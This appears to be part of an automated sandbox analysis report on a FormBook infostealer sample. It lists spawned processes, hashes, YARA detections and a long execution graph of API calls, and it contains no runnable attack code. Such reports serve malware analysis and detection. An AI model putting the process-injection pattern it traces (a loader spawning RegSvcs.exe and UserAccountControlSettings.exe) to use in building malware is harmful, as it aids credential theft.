                                                                                                                                                                          Target ID:21
                                                                                                                                                                          Start time:13:02:55
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                          MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:13:03:17
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\UserAccountControlSettings.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\UserAccountControlSettings.exe"
                                                                                                                                                                          Imagebase:0x1c0000
                                                                                                                                                                          File size:89'600 bytes
                                                                                                                                                                          MD5 hash:5AEA4CD2B6CA1E44E27D1A95917FEE60
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:23
                                                                                                                                                                          Start time:13:03:21
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x130000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:24
                                                                                                                                                                          Start time:13:03:22
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x850000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:25
                                                                                                                                                                          Start time:13:03:24
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:26
                                                                                                                                                                          Start time:13:03:24
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x40000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:13:03:25
Start date:05/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196
Imagebase:0xfc0000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:13:05:49
Start date:05/12/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff633410000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false


Execution Graph

Execution Coverage:9.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:11.2%
Total number of Nodes:1868
Total number of Limit Nodes:31
29113->29126 29469 2419a9 26 API calls 29113->29469 29115->29158 29435 2419a9 26 API calls 29115->29435 29120 241a66 26 API calls 29116->29120 29131 24c409 29117->29131 29438 24b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29117->29438 29125 24c3da 29120->29125 29122 24d276 29122->29158 29501 2419a9 26 API calls 29122->29501 29128 241a66 26 API calls 29125->29128 29126->29158 29470 2419a9 26 API calls 29126->29470 29128->29158 29129 24c33d _wcslen 29437 24f103 52 API calls 2 library calls 29129->29437 29130 24c4ea 29356 24b2ee 29130->29356 29131->29130 29132 24f711 53 API calls 29131->29132 29144 24c49b 29132->29144 29136->29108 29136->29111 29137 24c5c2 29138 24c7d8 29137->29138 29142 24c5cf 29137->29142 29447 252a36 106 API calls 29138->29447 29140 241a66 26 API calls 29140->29130 29143 24c62c 29142->29143 29441 2457c0 28 API calls 2 library calls 29142->29441 29147 24c781 29143->29147 29143->29152 29176 24c77a 29143->29176 29442 24b015 28 API calls 29143->29442 29443 252a36 106 API calls 29143->29443 29444 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29143->29444 29445 24b8ed 80 API calls 29143->29445 29144->29140 29146 24c501 29153 24c551 29146->29153 29439 2419a9 26 API calls 29146->29439 29151 24c830 29147->29151 29448 24ede9 110 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29147->29448 29150 24c8f0 29159 24c9eb 29150->29159 29165 24c8ff 29150->29165 29151->29150 29155 24c859 29151->29155 29152->29122 29500 2419a9 26 API calls 29152->29500 29153->29158 29440 2419a9 26 API calls 29153->29440 29162 24ca64 29155->29162 29167 24ed0d 49 API calls 29155->29167 29183 24c874 29155->29183 29158->29096 29159->29183 29362 24b345 29159->29362 29160 24c940 29163 24ddc7 105 API calls 29160->29163 29166 24d1f2 29162->29166 29189 24cac5 29162->29189 29471 24e152 29162->29471 29163->29113 29164 24ca01 29168 24ca05 29164->29168 29368 24b778 29164->29368 29165->29160 29468 24b544 135 API calls 
__EH_prolog3_GS 29165->29468 29169 24ddc7 105 API calls 29166->29169 29170 24c8b3 29167->29170 29171 24ddc7 105 API calls 29168->29171 29169->29112 29170->29183 29449 24d8b8 29170->29449 29171->29152 29175 24cb15 29181 24fd70 28 API calls 29175->29181 29446 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29176->29446 29178 24b345 81 API calls 29184 24ca5e 29178->29184 29204 24cb2f 29181->29204 29183->29162 29183->29168 29183->29178 29184->29162 29184->29168 29187 24cab7 29475 249653 100 API calls 29187->29475 29398 24fd70 29189->29398 29190 24cc21 29191 24cc76 29190->29191 29192 24cf27 29190->29192 29193 24cd33 29191->29193 29194 24cc94 29191->29194 29195 24cf50 29192->29195 29196 24cf39 29192->29196 29220 24ccb5 29192->29220 29479 2522b9 28 API calls 29193->29479 29199 24ccd8 29194->29199 29207 24cca3 29194->29207 29402 259625 29195->29402 29486 24d771 29196->29486 29198 24cd69 29202 25106b 45 API calls 29198->29202 29199->29220 29478 24a7a2 133 API calls 29199->29478 29205 24cd76 29202->29205 29203 24cf73 29418 2594ea 29203->29418 29204->29190 29476 24e39d 8 API calls 29204->29476 29480 24b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29205->29480 29477 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29207->29477 29213 24cdaf 29214 24cddd 29213->29214 29215 24cdcd 29213->29215 29216 24cddf 29213->29216 29221 24ce3e 29214->29221 29483 2419a9 26 API calls 29214->29483 29481 24a496 110 API calls 29215->29481 29482 24d3d7 126 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29216->29482 29223 24cf15 29220->29223 29485 24fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29220->29485 29221->29220 29484 2419a9 26 API calls 29221->29484 29226 24d044 29223->29226 29497 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29223->29497 29225 24d115 29426 24e772 29225->29426 29226->29166 29226->29225 29230 24d161 29226->29230 29425 
24e8d9 SetEndOfFile 29226->29425 29229 24d159 29231 24de50 101 API calls 29229->29231 29230->29166 29232 24f58b 49 API calls 29230->29232 29231->29230 29233 24d1d2 29232->29233 29233->29166 29498 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29233->29498 29235 24d1e8 29499 249500 100 API calls __EH_prolog3_GS 29235->29499 29238 242350 29237->29238 29239 24233e 29237->29239 29240 241a66 26 API calls 29238->29240 29239->29238 29704 2423b0 26 API calls 29239->29704 29242 242369 29240->29242 29705 242ed0 26 API calls 29242->29705 29244 242374 29706 2424d9 26 API calls 29244->29706 29261 24e927 29260->29261 29262 24e931 29261->29262 29707 2493d7 101 API calls __EH_prolog3_GS 29261->29707 29262->29001 29264->29027 29265->29027 29267 25028f __cftof 29266->29267 29274 250152 29267->29274 29270 241a66 26 API calls 29271 2502b4 29270->29271 29272 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29271->29272 29273 2502bf 29272->29273 29273->29047 29275 2425a4 26 API calls 29274->29275 29276 2501c7 29275->29276 29276->29270 29278 241206 29277->29278 29279 2411e8 29277->29279 29298 241a25 27 API calls 2 library calls 29278->29298 29280 2656f6 28 API calls 29279->29280 29282 2411ee 29280->29282 29284 2411f5 29282->29284 29297 26ac9e 26 API calls _abort 29282->29297 29283 24120b 29284->29055 29287 24e875 29286->29287 29288 24e862 29286->29288 29289 24e880 29287->29289 29291 24e888 SetFilePointer 29287->29291 29288->29289 29299 249490 100 API calls 29288->29299 29289->29066 29291->29289 29292 24e8a4 GetLastError 29291->29292 29292->29289 29293 24e8ae 29292->29293 29293->29289 29300 249490 100 API calls 29293->29300 29295->29069 29296->29061 29298->29283 29299->29287 29300->29289 29302 26430c __EH_prolog3_GS 29301->29302 29317 252117 29302->29317 29305 254318 53 API calls 29306 264342 29305->29306 29307 256a25 53 API calls 29306->29307 29308 26434c 29307->29308 29309 241a66 26 API calls 29308->29309 29310 26435b 29309->29310 
29321 263ec5 29310->29321 29313 241a66 26 API calls 29314 264375 29313->29314 29315 265787 5 API calls 29314->29315 29316 258665 29315->29316 29316->29019 29318 252124 29317->29318 29319 24769f 45 API calls 29318->29319 29320 252136 29319->29320 29320->29305 29322 263ed1 __EH_prolog3_GS 29321->29322 29323 2414a7 28 API calls 29322->29323 29324 263edd 29323->29324 29325 263572 12 API calls 29324->29325 29326 263eec 29325->29326 29327 241a66 26 API calls 29326->29327 29328 263ef4 29327->29328 29329 265787 5 API calls 29328->29329 29330 263ef9 29329->29330 29330->29313 29331->29086 29332->29086 29333->29084 29335 247e27 __EH_prolog3_GS 29334->29335 29504 247bfc 29335->29504 29337 247e6c 29338 265787 5 API calls 29337->29338 29339 247ecf 29338->29339 29339->29102 29340 247e68 29340->29337 29343 247ed2 29340->29343 29345 247ebe 29340->29345 29509 247bd6 30 API calls 29340->29509 29342 241a66 26 API calls 29342->29337 29343->29345 29510 24adaa CompareStringW 29343->29510 29345->29342 29355 251095 29346->29355 29347 251256 29349 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29347->29349 29348 24769f 45 API calls 29350 251241 29348->29350 29351 24c11b 29349->29351 29352 2425a4 26 API calls 29350->29352 29351->29109 29432 252095 45 API calls __EH_prolog3_GS 29351->29432 29353 25124d 29352->29353 29354 241a66 26 API calls 29353->29354 29354->29347 29355->29347 29355->29348 29357 24b303 29356->29357 29358 24b33b 29357->29358 29553 249635 80 API calls 29357->29553 29358->29137 29358->29146 29360 24b333 29554 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29360->29554 29363 24b368 29362->29363 29365 24b39e 29362->29365 29363->29365 29555 2585fd 66 API calls 29363->29555 29365->29164 29366 24b39a 29366->29365 29556 2432a1 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29366->29556 29369 24b784 __EH_prolog3_GS 29368->29369 29370 24b8e3 29369->29370 29372 24d8b8 129 API calls 29369->29372 29371 265787 5 
API calls 29370->29371 29373 24b8ea 29371->29373 29374 24b7ef 29372->29374 29373->29183 29374->29370 29557 249283 100 API calls 29374->29557 29376 24b817 29377 24ed0d 49 API calls 29376->29377 29378 24b81d 29377->29378 29379 24b838 29378->29379 29558 24ed1f 29378->29558 29571 251a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29379->29571 29382 24b83e 29382->29370 29572 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29382->29572 29383 24b827 29383->29379 29570 2432a1 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29383->29570 29385 24b850 29386 247673 28 API calls 29385->29386 29388 24b859 29386->29388 29389 24b88d 29388->29389 29573 24ede9 110 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29388->29573 29390 24eaf3 54 API calls 29389->29390 29394 24b8c9 29389->29394 29392 24b8a1 29390->29392 29393 24d8b8 129 API calls 29392->29393 29395 24b8c5 29393->29395 29396 241a66 26 API calls 29394->29396 29395->29394 29574 249283 100 API calls 29395->29574 29396->29370 29399 24fd7e 29398->29399 29401 24fd88 29398->29401 29400 2656f6 28 API calls 29399->29400 29400->29401 29401->29175 29403 259639 29402->29403 29404 25975f 29403->29404 29407 259644 29403->29407 29406 26734a CallUnexpected RaiseException 29404->29406 29405 259739 29405->29203 29412 25970b 29406->29412 29407->29405 29408 2596ed 29407->29408 29410 26d08c ___std_exception_copy 21 API calls 29407->29410 29407->29412 29408->29405 29411 25971f 29408->29411 29408->29412 29409 26734a CallUnexpected RaiseException 29416 2597a3 __EH_prolog3 __cftof 29409->29416 29410->29408 29411->29405 29576 259556 80 API calls 4 library calls 29411->29576 29412->29409 29414 259896 29414->29203 29415 26d08c ___std_exception_copy 21 API calls 29415->29416 29416->29414 29416->29415 29577 249384 80 API calls 29416->29577 29419 2594f3 29418->29419 29420 25951d 29419->29420 29421 25951f 29419->29421 29422 
259515 29419->29422 29420->29220 29593 25abc8 146 API calls 29421->29593 29578 25b76f 29422->29578 29425->29225 29427 24e783 29426->29427 29429 24e792 29426->29429 29428 24e789 FlushFileBuffers 29427->29428 29427->29429 29428->29429 29430 24e80f SetFileTime 29429->29430 29430->29229 29431->29095 29432->29106 29433->29109 29434->29115 29435->29158 29436->29129 29437->29136 29438->29131 29439->29153 29440->29158 29441->29143 29442->29143 29443->29143 29444->29143 29445->29143 29446->29147 29447->29147 29448->29151 29450 24d8c5 29449->29450 29451 24ed0d 49 API calls 29450->29451 29460 24d8d7 29451->29460 29452 24d93e 29453 24d953 29452->29453 29455 24de9a 49 API calls 29452->29455 29458 24eaf3 54 API calls 29453->29458 29463 24d957 29453->29463 29454 24d8e8 29454->29460 29672 24d990 116 API calls __EH_prolog3_GS 29454->29672 29455->29453 29459 24d973 29458->29459 29461 24d977 29459->29461 29462 24d982 29459->29462 29460->29452 29460->29454 29460->29463 29465 24ed0d 49 API calls 29460->29465 29673 25846c 61 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29460->29673 29674 2492e6 RaiseException CallUnexpected 29460->29674 29464 24de9a 49 API calls 29461->29464 29466 24ec63 49 API calls 29462->29466 29463->29183 29464->29463 29465->29460 29466->29463 29468->29160 29469->29126 29470->29158 29472 24caa5 29471->29472 29473 24e15b GetFileType 29471->29473 29472->29189 29474 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29472->29474 29473->29472 29474->29187 29475->29189 29476->29190 29477->29220 29478->29220 29479->29198 29480->29213 29481->29214 29482->29214 29483->29221 29484->29220 29485->29223 29487 24d77d __EH_prolog3 29486->29487 29488 2411dd 28 API calls 29487->29488 29489 24d788 29488->29489 29490 252af9 141 API calls 29489->29490 29496 24d7b1 29490->29496 29491 24d804 29493 24d828 29491->29493 29683 2419a9 26 API calls 29491->29683 29493->29220 29495 252af9 141 API calls 29495->29496 29496->29491 29496->29495 29675 
252ce5 29496->29675 29497->29226 29498->29235 29499->29166 29500->29122 29501->29158 29502->29158 29503->29158 29511 24790e 29504->29511 29506 247c1d 29506->29340 29508 24790e 47 API calls 29508->29506 29509->29340 29510->29345 29512 25106b 45 API calls 29511->29512 29529 247989 _wcslen 29512->29529 29513 247b1b 29518 247b4a 29513->29518 29542 2419a9 26 API calls 29513->29542 29514 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29517 247bbb 29514->29517 29517->29506 29517->29508 29519 247b92 29518->29519 29543 2419a9 26 API calls 29518->29543 29519->29514 29520 252117 45 API calls 29520->29529 29521 247673 28 API calls 29521->29529 29523 25106b 45 API calls 29523->29529 29524 24769f 45 API calls 29524->29529 29526 247bc2 29528 241a66 26 API calls 29526->29528 29527 241a66 26 API calls 29527->29529 29530 247bc7 29528->29530 29529->29513 29529->29520 29529->29521 29529->29523 29529->29524 29529->29526 29529->29527 29533 251a9f 29529->29533 29537 241b63 29529->29537 29541 247bd6 30 API calls 29529->29541 29531 241a66 26 API calls 29530->29531 29531->29513 29534 251ab1 29533->29534 29544 2496e5 29534->29544 29538 241b8e 29537->29538 29539 241b6f 29537->29539 29552 2413f7 28 API calls 29538->29552 29539->29529 29541->29529 29542->29518 29543->29519 29545 2496f1 _wcslen 29544->29545 29548 2490f4 29545->29548 29551 249137 __cftof 29548->29551 29549 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29550 2491a9 29549->29550 29550->29529 29551->29549 29552->29539 29553->29360 29554->29358 29555->29366 29556->29365 29557->29376 29559 24ed2b __EH_prolog3_GS 29558->29559 29560 24ed38 GetFileAttributesW 29559->29560 29561 24ed46 29560->29561 29568 24edad 29560->29568 29563 25169a 47 API calls 29561->29563 29562 265787 5 API calls 29564 24edc3 29562->29564 29565 24ed68 29563->29565 29564->29383 29566 24ed78 GetFileAttributesW 29565->29566 29567 24ed81 29565->29567 29566->29567 29567->29568 29575 2419a9 26 API calls 29567->29575 
29568->29562 29570->29379 29571->29382 29572->29385 29573->29389 29574->29394 29575->29568 29576->29405 29577->29416 29594 2597a4 29578->29594 29580 25b78e __InternalCxxFrameHandler 29580->29580 29582 25bb9c 29580->29582 29599 252af9 29580->29599 29610 257590 29580->29610 29616 25a008 141 API calls 29580->29616 29617 25bc05 141 API calls 29580->29617 29618 2577cf 29580->29618 29622 259a2b 120 API calls 29580->29622 29623 25c27f 146 API calls 29580->29623 29624 25a814 120 API calls __InternalCxxFrameHandler 29582->29624 29584 25bbb5 __InternalCxxFrameHandler 29585 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29584->29585 29586 25bbfc 29585->29586 29586->29420 29593->29420 29597 2597b0 __EH_prolog3 __cftof 29594->29597 29595 259896 29595->29580 29596 26d08c ___std_exception_copy 21 API calls 29596->29597 29597->29595 29597->29596 29625 249384 80 API calls 29597->29625 29607 252b0f __InternalCxxFrameHandler 29599->29607 29600 252c7f 29601 252cb3 29600->29601 29626 252ab0 29600->29626 29603 252cd4 29601->29603 29632 2482a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29601->29632 29633 2573f8 29603->29633 29607->29600 29608 252c76 29607->29608 29630 24fe6f 114 API calls __EH_prolog3 29607->29630 29631 25cdb4 126 API calls __EH_prolog3_GS 29607->29631 29608->29580 29611 2575a1 29610->29611 29612 25759c 29610->29612 29614 2575b1 29611->29614 29615 2577cf 104 API calls 29611->29615 29649 257628 29612->29649 29614->29580 29615->29614 29616->29580 29617->29580 29619 257806 29618->29619 29620 2577db ResetEvent ReleaseSemaphore 29618->29620 29619->29580 29664 2575ed WaitForSingleObject 29620->29664 29622->29580 29623->29580 29624->29584 29625->29597 29627 252af5 29626->29627 29628 252ab8 29626->29628 29627->29601 29628->29627 29639 258618 29628->29639 29630->29607 29631->29607 29632->29603 29634 2573ff 29633->29634 29635 25741a 29634->29635 29647 2492e6 RaiseException 
CallUnexpected 29634->29647 29637 25742b SetThreadExecutionState 29635->29637 29648 2492e6 RaiseException CallUnexpected 29635->29648 29637->29608 29642 264231 29639->29642 29643 2560d5 29642->29643 29644 264248 SendDlgItemMessageW 29643->29644 29645 260678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 29644->29645 29646 258638 29645->29646 29646->29627 29647->29635 29648->29637 29650 2576a1 29649->29650 29651 257633 29649->29651 29650->29611 29651->29650 29652 257638 CreateThread 29651->29652 29653 257690 SetThreadPriority 29651->29653 29657 2492eb 100 API calls __EH_prolog3_GS 29651->29657 29658 249500 100 API calls __EH_prolog3_GS 29651->29658 29659 2492e6 RaiseException CallUnexpected 29651->29659 29652->29651 29660 257760 29652->29660 29653->29651 29657->29651 29658->29651 29659->29651 29663 25776e 107 API calls 29660->29663 29662 257769 29663->29662 29665 257624 29664->29665 29666 2575fe GetLastError 29664->29666 29665->29619 29670 2492eb 100 API calls __EH_prolog3_GS 29666->29670 29668 257618 29671 2492e6 RaiseException CallUnexpected 29668->29671 29670->29668 29671->29665 29672->29454 29673->29460 29674->29460 29676 252d18 29675->29676 29678 252cfe __InternalCxxFrameHandler 29675->29678 29676->29678 29684 24e948 29676->29684 29679 252d42 29678->29679 29701 24fe6f 114 API calls __EH_prolog3 29678->29701 29681 2573f8 2 API calls 29679->29681 29682 252d47 29681->29682 29682->29496 29683->29493 29685 24e954 __EH_prolog3_GS 29684->29685 29686 24e963 29685->29686 29687 24e976 GetStdHandle 29685->29687 29699 24e988 29685->29699 29688 265787 5 API calls 29686->29688 29687->29699 29690 24eaab 29688->29690 29689 24e9df WriteFile 29689->29699 29690->29678 29691 24e9ad 29692 24e9af WriteFile 29691->29692 29691->29699 29692->29691 29692->29699 29694 24ea77 29695 2414a7 28 API calls 29694->29695 29696 24ea84 29695->29696 29703 249653 100 API calls 29696->29703 29698 24ea97 29700 241a66 26 API calls 29698->29700 29699->29686 29699->29689 
29699->29691 29699->29692 29699->29694 29702 249230 102 API calls 29699->29702 29700->29686 29701->29679 29702->29699 29703->29698 29705->29244 29707->29262 29709 24f835 __EH_prolog3_GS 29708->29709 29710 24f925 FindNextFileW 29709->29710 29711 24f847 FindFirstFileW 29709->29711 29712 24f937 GetLastError 29710->29712 29713 24f948 29710->29713 29711->29713 29715 24f86a 29711->29715 29731 24f90d 29712->29731 29719 2414a7 28 API calls 29713->29719 29716 25169a 47 API calls 29715->29716 29717 24f88c 29716->29717 29720 24f8ac 29717->29720 29723 24f89c FindFirstFileW 29717->29723 29724 24f899 29717->29724 29718 265787 5 API calls 29721 24f733 29718->29721 29722 24f95f 29719->29722 29730 24f8e8 29720->29730 29732 2419a9 26 API calls 29720->29732 29721->29033 29721->29036 29733 25229d 29722->29733 29723->29720 29724->29723 29727 24f902 GetLastError 29727->29731 29729 241a66 26 API calls 29729->29731 29730->29713 29730->29727 29731->29718 29732->29730 29734 2522a6 29733->29734 29737 25236c 29734->29737 29738 252378 29737->29738 29741 25238e 29738->29741 29740 24f970 29740->29729 29742 2524e5 29741->29742 29745 2523a4 29741->29745 29749 2458cb 45 API calls 29742->29749 29747 2523bc 29745->29747 29748 250c7f 28 API calls 29745->29748 29747->29740 29748->29747 29752 24d6e5 29750->29752 29753 24d70b 29750->29753 29752->29753 29755 24ec63 49 API calls 29752->29755 29786 24d89e 29753->29786 29755->29752 29756 24b231 26 API calls 29757 24d74c 29756->29757 29758 241a66 26 API calls 29757->29758 29759 24d755 29758->29759 29760 241a66 26 API calls 29759->29760 29761 24d75e 29760->29761 29762 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29761->29762 29763 24b1bf 29762->29763 29763->28936 29770 25909b 29763->29770 29765 2528bb 29764->29765 29791 24fb8e 29765->29791 29767 2528ed 29768 24fb8e 109 API calls 29767->29768 29769 2528f8 29768->29769 29771 2590aa 29770->29771 29772 2574ec 109 API calls 29771->29772 29773 2590b9 29771->29773 29772->29773 29802 
254264 26 API calls 29773->29802 29775 2590e8 29803 254264 26 API calls 29775->29803 29777 2590f3 29804 254264 26 API calls 29777->29804 29779 2590fe 29805 254288 26 API calls 29779->29805 29781 259132 29782 242e8b 26 API calls 29781->29782 29783 25913a 29782->29783 29784 242e8b 26 API calls 29783->29784 29785 259142 29784->29785 29787 24d714 29786->29787 29788 24d8a8 29786->29788 29787->29756 29790 24ae77 26 API calls 29788->29790 29790->29787 29792 24fbbb 29791->29792 29794 24fbc2 29791->29794 29795 2574ec 29792->29795 29794->29767 29796 2577cf 104 API calls 29795->29796 29797 257518 ReleaseSemaphore 29796->29797 29798 257556 DeleteCriticalSection CloseHandle CloseHandle 29797->29798 29799 257538 29797->29799 29798->29794 29800 2575ed 102 API calls 29799->29800 29801 257542 CloseHandle 29800->29801 29801->29798 29801->29799 29802->29775 29803->29777 29804->29779 29805->29781 29815 25eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29806->29815 29808 25eaad 29809 25eab9 29808->29809 29816 25eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29808->29816 29809->28556 29809->28557 29811->28562 29812->28569 29813->28569 29814->28569 29815->29808 29816->29809 29817->28573 29818->28576 29819->28588 29821 24e910 101 API calls 29820->29821 29822 242dc7 29821->29822 29823 242de4 29822->29823 29824 2427e0 124 API calls 29822->29824 29823->28597 29823->28598 29825 242dd4 29824->29825 29825->29823 29831 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29825->29831 29828 242797 29827->29828 29829 24279b 29827->29829 29828->28603 29832 2426d2 29829->29832 29831->29823 29833 242721 29832->29833 29834 2426e4 29832->29834 29840 245767 29833->29840 29835 2452d8 124 API calls 29834->29835 29838 242704 29835->29838 29838->29828 29841 245770 29840->29841 29842 2452d8 124 API calls 29841->29842 29843 242742 29841->29843 29844 2573f8 2 API calls 29841->29844 29842->29841 29843->29838 29845 242c30 29843->29845 29844->29841 29846 242c3c __EH_prolog3_GS 
29845->29846 29867 245365 29846->29867 29848 242c8f 29857 242d02 29848->29857 29903 2419a9 26 API calls 29848->29903 29849 265787 5 API calls 29852 242d18 29849->29852 29850 242c5a 29850->29848 29853 242c86 29850->29853 29854 242c91 29850->29854 29852->29838 29899 25888c 28 API calls 29853->29899 29855 242cb9 29854->29855 29856 242c9a 29854->29856 29901 258707 29 API calls 2 library calls 29855->29901 29900 25880e 28 API calls __EH_prolog3 29856->29900 29857->29849 29860 242ca7 29861 2425a4 26 API calls 29860->29861 29863 242caf 29861->29863 29865 241a66 26 API calls 29863->29865 29864 242cd2 29902 242ed0 26 API calls 29864->29902 29865->29848 29868 245380 29867->29868 29869 2453ae 29868->29869 29870 2453ca 29868->29870 29904 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29869->29904 29872 245634 29870->29872 29875 2453f6 29870->29875 29910 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29872->29910 29874 2453b9 29876 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29874->29876 29875->29874 29878 259625 80 API calls 29875->29878 29877 245659 29876->29877 29877->29850 29884 245449 29878->29884 29879 24547b 29881 24550d 29879->29881 29898 245472 29879->29898 29907 252a36 106 API calls 29879->29907 29880 245477 29880->29879 29906 24315d 28 API calls 29880->29906 29882 24fd70 28 API calls 29881->29882 29886 245520 29882->29886 29883 245467 29905 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29883->29905 29884->29879 29884->29880 29884->29883 29890 2455b9 29886->29890 29891 2455a9 29886->29891 29888 25909b 109 API calls 29888->29874 29893 2594ea 146 API calls 